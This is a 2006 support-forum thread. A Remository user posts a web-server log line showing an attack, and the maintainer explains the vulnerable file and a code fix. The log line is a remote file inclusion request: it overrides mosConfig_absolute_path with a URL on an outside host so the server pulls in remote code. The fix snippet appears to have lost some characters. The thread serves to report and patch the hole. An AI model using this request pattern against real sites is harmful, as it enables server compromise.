Home arrow Forum

Remository Forum

 


wayimp

Karma: 0  
My Remository keeps getting hacked like this... - 2006/08/11 18:16 66.135.34.139 - - [11/Aug/2006:02:19:36 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http:// mairie.lhermitage.free.fr/list.txt? HTTP/1.1" 200 22357 "-" "libwww-perl/5.79"

Notice they're overriding the Config_absolute_path setting with a URL variable, and pointing it to some french site.
  | | Sorry, you do not currently have permission to write here.
admin

Karma: 98  
Re:My Remository keeps getting hacked like this... - 2006/08/11 18:50 Sorry, there is a mistake in remository.admin.php which has left it vulnerable. You should either download and install Remository 3.26 (which fixes the problem) or edit the file.

To edit remository.admin.php look at lines 16 to 19, and swap the code on lines 16 and 17 with the code on line 19. The result should look like:
Code:

 // Don't allow direct linking defined'_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); require_once ($mosConfig_absolute_path.'/components/com_remository/com_remository_constants.php');


That will stop the problem.
Martin Brampton aka Counterpoint
http://aliro.org
http://black-sheep-research.com
  | | Sorry, you do not currently have permission to write here.

Login

Subscribe to Premium Support

Get priority support for Remository and Glossary, sign up now for a Premium Support monthly subscription:

Your Remository user name

Or purchase a year's support:

Your Remository user name

Recommended SEF

SEF Advance

Who is Online

Remository welcomes guests and visitors

We have 6 guest online